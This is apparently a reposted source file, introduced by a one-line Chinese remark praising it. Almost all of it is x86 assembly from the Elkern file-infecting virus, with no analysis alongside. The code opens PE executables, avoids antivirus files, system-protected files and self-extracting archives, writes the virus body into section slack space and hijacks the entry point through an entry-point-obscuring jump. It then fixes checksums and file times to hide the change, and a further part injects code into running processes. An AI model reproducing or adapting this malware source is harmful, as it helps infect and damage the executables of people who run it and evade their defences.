elkern.c源代码 .txt

真的是非常非常的好！

call [ebp+addrSetFileAttributesA-file_op_ip]

file_op_not_readonly:
push esi
push large FILE_ATTRIBUTE_ARCHIVE or FILE_ATTRIBUTE_HIDDEN
push large OPEN_EXISTING
push esi
push large FILE_SHARE_READ
push large GENERIC_WRITE or GENERIC_READ
push edi
call [ebp+addrCreateFileA-file_op_ip]
inc eax
jz file_op_fail_createfile
dec eax
push eax ;esp->file handle

lea ebx,[ebp+ftime-file_op_ip]
push ebx ;ebx->file last write time
add ebx,8
push ebx
add ebx,8
push ebx
push eax
call [ebp+addrGetFileTime-file_op_ip]

push ecx
push esp ;->file size high
push dword ptr [esp+2*4]
call [ebp+addrGetFileSize-file_op_ip]
pop ecx
inc eax
jz file_op_fail_getfilesize
dec eax
or ecx,ecx
jnz file_op_fail_getfilesize
push eax ;esp->file size
xchg eax,edi

add edi,vir_size+8+1000h ;edi=max file size
push esi
push edi
push esi
push large PAGE_READWRITE
push esi
push dword ptr [esp+5*4+4]
call [ebp+addrCreateFileMappingA-file_op_ip]
or eax,eax
jz file_op_fail_createfilemapping
push eax ; esp->save file mapping handle

push edi
push esi
push esi
push large FILE_MAP_WRITE
push eax
call [ebp+addrMapViewOfFile-file_op_ip]
or eax,eax
jz file_op_fail_mapviewoffile
push eax ;esp->save file mapping base pointer

mov [ebp+file_op_esp-file_op_ip],esp

;************************************************************************
;Now ebp->file_op_ip eax->file base(image base)
;esp->file mapping base address
;esp+4->file mapping handle
;esp+8h->file size
;esp+0ch->file handle
;esp+10h->file name pointer
;esp+14h->file attribute
;Les's begin file operation
;************************************************************************

xchg ebx,eax
SUBCALL check_pe,file_op_ip
jz short file_op_unmapping_jmp1

;Check AV file by look for 'irus' in the file
mov ecx,[esp+8]
cmp ecx,MIN_SIZE_TO_INFECT
jc file_op_unmapping

pushad
add ecx,eax
sub ecx,ebx
sub ecx,8
mov edi,eax
mov eax,'suri' ;V irus

check_av_1:
sub edi,3
scasd
loopnz short check_av_1
or ecx,ecx
popad
jnz short file_op_unmapping_jmpnz

;Let's check whether this file is under file protect,if so,not infect it,avoid WFP error
mov ecx,[ebp+addrSfcIsFileProtected-file_op_ip]
jecxz file_op_check_wfp_end
pushad

;check_wfp:
mov edi,640
sub esp,edi
mov ebx,esp

push ecx

push edi
push ebx ;lpWideCharStr
push -1
push dword ptr [esp+edi+FOPESP_BASE+4*4+8*4+10h]
push large 1 ;MB_PRECOMPOSED
push large 0 ;CP_ACP
call [ebp+addrMultiByteToWideChar-file_op_ip]

pop eax
push esp
push large 0
call eax

add esp,edi

or eax,eax
popad

file_op_unmapping_jmpnz:
jnz file_op_unmapping
file_op_check_wfp_end:

;Check whether it's a WinZip Self-Extractor file
movzx edx,word ptr [eax+14h]
mov edx,[eax+edx+18h+14h+28h] ;ebx->the second section's PointerToRawData
add edx,ebx
cmp dword ptr [edx+10h],'ZniW'
jnz not_winzip
cmp word ptr [edx+10h+4],'pi'
file_op_unmapping_jmp1:
jz file_op_unmapping
not_winzip:

;Check whether the file is a SFX(RAR file)
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
mov ecx,[edx+0ch]
add ecx,[edx+8]
mov esi,ecx
shr ecx,3
add ecx,esi
cmp ecx,[esp+FOPESP_BASE+8]
jna file_op_unmapping
add esi,ebx ;now ecx->perhaps rar file header
cmp dword ptr [esi],21726152h ;test for rar signature
jz short file_op_unmapping_jmp1

;Check infected
mov edi,[eax+28h]
SUBCALL get_section_of_rva,file_op_ip
sub edi,[edx+4]
add edi,[edx+0ch]
add edi,ebx

lea esi,[ebp+infbuffer-file_op_ip]
mov ecx,[edi]
mov [esi+host_entry_1-_start],ecx
mov cl,[edi+4]
mov [esi+host_entry_2-_start],cl
mov [ebp+entry_point-file_op_ip],edi

cmp byte ptr [edi],0e9h
jnz short check_infected_not_epo
add edi,[edi+1]
add edi,5
check_infected_not_epo:
cmp word ptr [edi-2],INF_SIGN
jnz short check_infected_end
cmp word ptr [edi+3],0h
jz file_op_unmapping_jmp1
check_infected_end:
;For EPO purpose,we must set the code section writable
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics

lea esi,[ebp+infbuffer-file_op_ip]
mov dword ptr [ebp+blk_min_size-file_op_ip],vir_first_blk_size+8
mov dword ptr [ebp+remaind_size-file_op_ip],vir_size
xor edx,edx
mov [ebp+block_pointer-file_op_ip],edx
cld

first_section:
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
next_section:
add edx,28h
mov ecx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
cmp ecx,edi
jna short file_op_1
xchg edi,ecx
file_op_1:
add ecx,[edx+0ch]
mov edi,vir_first_blk_size+8+38h
call is_final_section
jz short inf_at_tail
mov edi,[edx+28h+0ch]
sub edi,ecx
cmp edi,vir_first_blk_size+8
blk_min_size equ $-4
;NOTE:Next section's PointerToRawData may be 0 or less than current PointerToRawData 
;if so,don't use this section.So use jl instead of jc
jl goto_next_section
inf_at_tail:
;Some PE file's .BSS(uninitialized data) and .TLS section's PointerToRawData can be 0,it doesn't take
;disk space.If infect this kind of section,the file will be damaged.So must avoid it.
cmp dword ptr [edx+0ch],0 ;this section's PointerToRawData==0?
jz goto_next_section

xchg edi,ecx
add edi,[esp]
mov dword ptr [edi],0
sub ecx,8
cmp ecx,[ebp+remaind_size-file_op_ip]
jl short file_op_8
mov ecx,[ebp+remaind_size-file_op_ip]
file_op_8:
sub [ebp+remaind_size-file_op_ip],ecx
mov dword ptr [edi+4],ecx
add edi,8
mov ebx,12345678h
block_pointer equ $-4
or ebx,ebx
jz short file_op_7
push edi
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[esp+4]
mov [ebx-8],edi
pop edi
file_op_7:
mov [ebp+block_pointer-file_op_ip],edi
lea ebx,[ebp+infbuffer-file_op_ip+vir_first_blk_size-10h]
cmp esi,ebx ;is first block?
ja file_op_2 ;No
mov word ptr [edi-2],INF_SIGN
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics

;Check relocation,try to implement EPO

mov ebx,[eax+28h] ;AddressOfEntryPoint 
mov [esi+host_entry_rva-_start],ebx ;save host code entry

pushad

sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[esp+FOPESP_BASE+8*4]
mov [ebp+redir_entry_point-file_op_ip],edi
add edi,(_start_ip-_start)
mov [esi+host_section_rva-_start],edi ;save host code base

mov ecx,[eax+0a0h] ;Relocation RVA
or ecx,ecx
jz short chk_reloc_end
mov edi,ecx
SUBCALL get_section_of_rva,file_op_ip
sub edi,[edx+4]
add edi,[edx+0ch]
add edi,[esp+FOPESP_BASE+8*4] ;Physical address
mov esi,edi
xor ecx,ecx

next_reloc_trunk:
add esi,ecx
lodsd
mov edx,eax
lodsd
mov ecx,eax
sub ecx,8
clc
or edx,edx
jz short chk_reloc_end
cmp ebx,edx
jc short next_reloc_trunk
push edx
add edx,1000h
cmp ebx,edx
pop edx
ja short next_reloc_trunk
;Found the fit trunk
shr ecx,1
xor eax,eax
mov edi,edx

chk_reloc_1:
lodsw
or eax,eax
jz short chk_reloc_end
and eax,0fffh
add edx,eax
mov eax,ebx
sub eax,3
cmp edx,eax
jc short chk_reloc_2
add eax,8
cmp edx,eax
jc short chk_reloc_3
chk_reloc_2:
mov edx,edi
loop chk_reloc_1

chk_reloc_3:
or ecx,ecx
chk_reloc_end:

popad
mov dword ptr [eax+28h],12345678h
redir_entry_point equ $-4
pushad
jnz short epo_end
mov [eax+28h],ebx ;restore entry point
mov ebx,12345678h
entry_point equ $-4

mov byte ptr [ebx],0e9h
sub edi,[esp+8*4]
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[eax+28h]
sub edi,5
mov [ebx+1],edi

epo_end:
popad

file_op_2:
mov dword ptr [ebp+blk_min_size-file_op_ip],INF_MIN_BLK_SIZE

pushad
sub edi,[edx+0ch]
add edi,[edx+4]
mov ebx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
xor esi,esi
cmp ebx,edi
jna short file_op_3
xchg edi,ebx
inc esi
file_op_3:
add ebx,ecx
add ebx,8
file_op_4:
cmp ebx,edi ;is bigger one less than small one?
jna short file_op_5 ;no
add edi,[eax+3ch] ;FileAlignment
jmp short file_op_4
file_op_5:
or esi,esi
jz short file_op_6
xchg edi,ebx
file_op_6:
mov [edx],ebx
mov [edx+8],edi
popad

rep movsb
or dword ptr [edx+1ch],00000040h or 40000000h; modify section's Characteristics
and dword ptr [edx+1ch],not 02020000 ;delete discardable Characteristics

goto_next_section:
mov ecx,vir_size
remaind_size equ $-4
jecxz file_op_ok
call is_final_section
jnz next_section
jmp first_section
file_op_ok:
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip

;Round image size
mov ecx,[edx]
add ecx,[edx+4]
mov ebx,[eax+50h]
file_op_9:
cmp ecx,ebx
jbe short file_op_10
add ebx,[eax+38h]
jmp short file_op_9
file_op_10:
mov [eax+50h],ebx

;Round physical size
mov ecx,[edx+8]
add ecx,[edx+0ch]
cmp ecx,[esp+8]
jc short file_op_11
mov [esp+8],ecx
file_op_11:
                               

pop esi ;esi=file base
push esi

mov byte ptr [esi+MEM_INF_POS],MEM_INF_SIGN ;Set memory infected sign.

;Recalculate checksum if there is any
lea ebx,[eax+58h]
mov ecx,[ebx] ;Is the checksum zero?
jecxz no_checksum ;Yes,it's zero,nothing to do;
;Now let me calculate the checksum
mov dword ptr [ebx],0 ;zero the checksum

mov ecx,[esp+8] ;the file size
push ecx ;the file size after infect
shr ecx,1
xor edx,edx
checksum_loop:
movzxeax, word ptr [esi]
addedx, eax
moveax, edx
andedx, 0ffffh
shreax, 10h
addedx, eax
inc esi
inc esi
loop checksum_loop

moveax, edx
shreax, 10h
addax, dx
pop ecx
addeax,ecx
;Now eax is the checksum,store it
mov [ebx],eax

no_checksum:

file_op_unmapping:

mov esp,12345678h
file_op_esp equ $-4

;Now esp have point to file mapping base pointer
call [ebp+addrUnmapViewOfFile-file_op_ip]
file_op_fail_mapviewoffile:
call [ebp+addrCloseHandle-file_op_ip] ;Close file mapping
file_op_fail_createfilemapping:
pop eax ;eax=file size
push large 0
push large 0
push eax
push dword ptr [esp+4*3]
call [ebp+addrSetFilePointer-file_op_ip]

push dword ptr [esp]
call [ebp+addrSetEndOfFile-file_op_ip] ;truncate the file to fit size

file_op_fail_getfilesize:
pop eax
push eax
lea ebx,[ebp+ftime-file_op_ip]
push ebx ;ebx->file last write time
add ebx,8
push ebx
add ebx,8
push ebx
push eax
call [ebp+addrSetFileTime-file_op_ip]

call [ebp+addrCloseHandle-file_op_ip] ;Close file
file_op_fail_createfile:
call [ebp+addrSetFileAttributesA-file_op_ip]

xor ecx,ecx
POP    DWord Ptr FS:[ecx]  ; restore except chain
pop ecx
pop ecx
file_op_ret:
popad
retn

file_op_seh:
call file_op_seh_ip
file_op_seh_ip:

pop eax
lea eax,[eax-(file_op_seh_ip-file_op_unmapping)]
PUSH  eax
MOV   EAX,[ESP + 00Ch+4]          ; context
POP   DWord Ptr [EAX + 0B8h]     ; context.eip = @ExceptProc
XOR   EAX,EAX                    ; 0 = ExceptionContinueExecution
RET

;in--edx->current section VirtualSize,eax->PE base,ebx->base address,ebp->file_op_ip
;out--ZF set is final,ZF cleared isn't final
is_final_section:
pushad
mov ecx,edx
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
cmp ecx,edx
popad
retn
is_final_section_end:

file_operate_end:
;*******************************infect.asm end*****************************

;*******************************infproc.asm*****************************
;include infproc.asm
;Code to inject to process
CALLHEADER inject_code
inject_code:
jmp short $+2
inject_code_flow equ $-1
pushad
pushfd
call inject_code_ip
inject_code_ip:
pop ebp

xor esi,esi

call inject_code_1
db FMAP_NAME
inject_code_1:
push esi
push large FILE_MAP_WRITE
mov edx,12345678h
inject_code_openfilemapping equ $-4
call edx
or eax,eax
jz short inject_code_goto_raw

push esi
push esi
push esi
push large FILE_MAP_WRITE
push eax
mov edx,12345678
inject_code_mapviewoffile equ $-4
call edx
or eax,eax
jz short inject_code_goto_raw

mov byte ptr [ebp+inject_code_flow-inject_code_ip],inject_code_goto_raw_1-inject_code_flow-1

lea ebp,[eax+_start_ip-vir_header]
add eax,main_enter-vir_header
call eax

inject_code_goto_raw:
popfd
popad
inject_code_goto_raw_1:
push large 12345678h
inject_code_raw_api equ $-4
retn
inject_code_end:
inject_code_size equ $-inject_code

;in--edi=process handle,ebx->process base address,ebp->inf_proc_ip
;out--ZF set,failed ZF cleared,success
CALLHEADER virtual_protect
virtual_protect:
pushad
push ecx
push esp
push large PAGE_EXECUTE_READWRITE
push large INFPROC_PROT_SIZE
push ebx
push edi
call [ebp+addrVirtualProtectEx-inf_proc_ip]
pop ecx
or eax,eax
popad
retn
virtual_protect_end:

;in--edi=process handle,ebx=process address to read,ebp->inf_proc_ip
;out--read data to vbuffer,eax->vbuffer
CALLHEADER read_proc_mem
read_proc_mem:
lea eax,[ebp+vbuffer-inf_proc_ip]
pushad

push ecx
push esp
push large INFPROC_MAP_SIZE
push eax
push ebx
push edi
call [ebp+addrReadProcessMemory-inf_proc_ip]
pop ecx
or eax,eax

popad
retn
read_proc_mem_end:

;in--edi=process handle,ebx=process address to write,ebp->inf_proc_ip,eax->buffer,ecx=size to write
;out--write data from vbuffer
CALLHEADER write_proc_mem
write_proc_mem:
pushad

push ecx
push esp
push ecx
push eax
push ebx
push edi
call [ebp+addrWriteProcessMemory-inf_proc_ip]
pop ecx
or eax,eax

popad
retn
write_proc_mem_end:

;in--edi=process handle,ebx->process base address
CALLHEADER inf_proc
inf_proc:
pushad
call inf_proc_ip
inf_proc_ip:
pop ebp

push ebp
lea esi,[ebp+inf_proc_seh-inf_proc_ip]
push esi
xor esi,esi
push dword ptr fs:[esi]
mov fs:[esi],esp